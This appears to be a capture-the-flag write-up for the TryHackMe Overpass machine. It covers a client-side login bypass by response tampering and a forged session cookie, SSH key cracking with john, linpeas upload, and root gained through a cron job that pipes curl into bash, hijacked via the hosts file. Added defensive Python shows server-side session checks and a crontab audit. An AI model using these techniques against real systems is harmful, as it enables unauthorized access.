Feels like it's not as good as the box... the network speed
So fast

Way too fast, bro
Went to the login page to take a look and found that the check in login.js just looks for a specific string returned by the backend to decide whether the login is valid. So use Burp's intercept, and when the response comes back as "incorrect", change the response packet to

HTTP/1.1 302 FOUND
Date: Mon, 20 Jul 2020 14:33:13 GMT
Content-Length: 21
Content-Type: text/plain; charset=utf-8
Connection: close
location: /admin

The redirect to admin succeeds.
Alternatively, just set the cookie directly: document.cookie="SessionToken=pleaselogmein"
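What makes this bypass work is that the server trusts the client: the browser decides it is logged in based on a response string, and the session cookie is a fixed, guessable value. As an added example (my own code, not from the original writeup and not the Overpass application's code), here is the server-side pattern that closes both holes: a random token issued at login, kept in a server-side store, and validated on every request no matter what the page's JavaScript or a modified HTTP response claims. The SESSIONS dict and the function names are hypothetical.

```python
import hmac
import secrets
from http.cookies import SimpleCookie

# Hypothetical in-memory session store: token -> username.
# A real deployment would use a database or cache with expiry.
SESSIONS = {}


def issue_session(username: str) -> str:
    """Create an unguessable session token for a user who has just authenticated."""
    token = secrets.token_urlsafe(32)  # 256 bits of randomness, not a fixed string
    SESSIONS[token] = username
    return token


def _lookup(token: str):
    # Constant-time comparison against each stored token so that timing
    # differences do not leak how many leading characters matched.
    token_bytes = token.encode("utf-8", "surrogateescape")
    for stored, user in SESSIONS.items():
        if hmac.compare_digest(stored.encode(), token_bytes):
            return user
    return None


def authorized_user(cookie_header: str):
    """Return the username bound to the SessionToken cookie, or None.

    This runs on the server for every request to a protected path such as
    /admin; the client never gets to decide whether it is logged in.
    """
    cookie = SimpleCookie()
    cookie.load(cookie_header or "")
    morsel = cookie.get("SessionToken")
    if morsel is None:
        return None
    return _lookup(morsel.value)


if __name__ == "__main__":
    tok = issue_session("james")
    print(authorized_user(f"SessionToken={tok}"))         # a real session -> "james"
    print(authorized_user("SessionToken=pleaselogmein"))  # the fixed value -> None
```

With this in place, rewriting the login response to a 302 only changes what the browser displays; the request for /admin still arrives without a valid token and is refused.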


Export the key to a hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Cracking yields the password james13
ssh -i key james@10.10.186.149

Upload linpeas.sh
scp -i key linpeas.sh james@10.10.186.149:~/linpeas.sh

james@overpass-prod:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

Look at that suspicious curl.
Just edit the hosts file so the name points at our machine.
Reverse shell, go!
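From the defender's side, the crontab above is the whole story: a job running as root every minute fetches a script by hostname over plain HTTP and pipes it straight into bash, so whoever controls name resolution on the host (/etc/hosts or DNS) controls what root executes. As an added example, not from the writeup or from the Overpass machine, here is a small audit that parses a system crontab and flags exactly that pattern; the sample crontab is constructed from the output above, and the function names and FETCHERS/SHELLS lists are my own.

```python
import re
import shlex

# Constructed sample: the relevant lines of the /etc/crontab shown above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
"""

FETCHERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}


def parse_system_crontab(text):
    """Yield (schedule, user, command) for each job in a system crontab
    (/etc/crontab or /etc/cron.d/*), skipping comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        yield " ".join(parts[:5]), parts[5], parts[6]


def pipes_remote_into_shell(command):
    """True if a fetcher's output is piped into an interpreter, e.g. 'curl URL | bash'."""
    # Split on single '|' only, so '||' (shell OR) is not mistaken for a pipe.
    stages = re.split(r"(?<!\|)\|(?!\|)", command)
    for left, right in zip(stages, stages[1:]):
        lhs, rhs = shlex.split(left), shlex.split(right)
        if not lhs or not rhs:
            continue
        lcmd = lhs[0].rsplit("/", 1)[-1]
        rcmd = rhs[0].rsplit("/", 1)[-1]
        if lcmd in FETCHERS and rcmd in SHELLS:
            return True
    return False


def audit(text):
    """Return one finding per cron job that executes remotely fetched code."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        if not pipes_remote_into_shell(command):
            continue
        # First token that looks like host/path (scheme optional; curl assumes http).
        url = next((a for a in shlex.split(command)
                    if re.match(r"^(https?://)?[\w.-]+/", a)), None)
        findings.append({
            "schedule": schedule,
            "user": user,
            "command": command,
            "url": url,
            # No https:// means the fetch is unauthenticated: a hosts-file or
            # DNS change on the box swaps the script for anything else.
            "plaintext": url is not None and not url.startswith("https://"),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB):
        print(f"[{f['user']}] {f['schedule']} {f['command']}"
              f"  -> remote code, plaintext={f['plaintext']}")
```

The mitigation is the mirror image of the finding: vendor the build script onto the host (or into a package) instead of fetching it at run time, and if it must be fetched, use https:// with certificate verification and a non-root user. Running the audit over /etc/crontab and /etc/cron.d/* on a fleet is a cheap way to catch this class of job before someone else does.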

thm{7f336f8c359dbac18d54fdd64ea753bb}

That was such a roundabout path, hmm.
In the end I used their box to set up a proxy and connected straight through with chisel. Thanks, THM.